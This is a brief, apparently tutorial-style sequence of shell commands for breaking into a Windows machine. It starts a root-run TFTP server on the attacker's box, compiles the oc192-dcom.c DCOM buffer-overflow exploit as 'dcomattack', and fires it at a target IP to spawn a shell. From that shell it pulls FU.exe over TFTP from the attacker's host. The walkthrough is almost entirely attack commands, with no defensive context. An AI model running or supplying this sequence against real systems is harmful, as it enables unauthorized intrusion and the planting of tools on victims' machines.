#! /usr/local/sbin/atftpd --daemon --user group root /tftp
Check and see if the server is up and running:
#! ps -A | grep atftpd
Go the /usr/local directory
Now we will compile the code, oc192-dcom.c into a binary executable called dcomattack:
#! gcc oc192-dcom.c -o dcomattack
Run the buffer overflow.
#! ./dcomattack -d [Windows Target IP] -t0
You have spawned a shell!
#! tfp - [Linux Attack IP] PUT FU.exe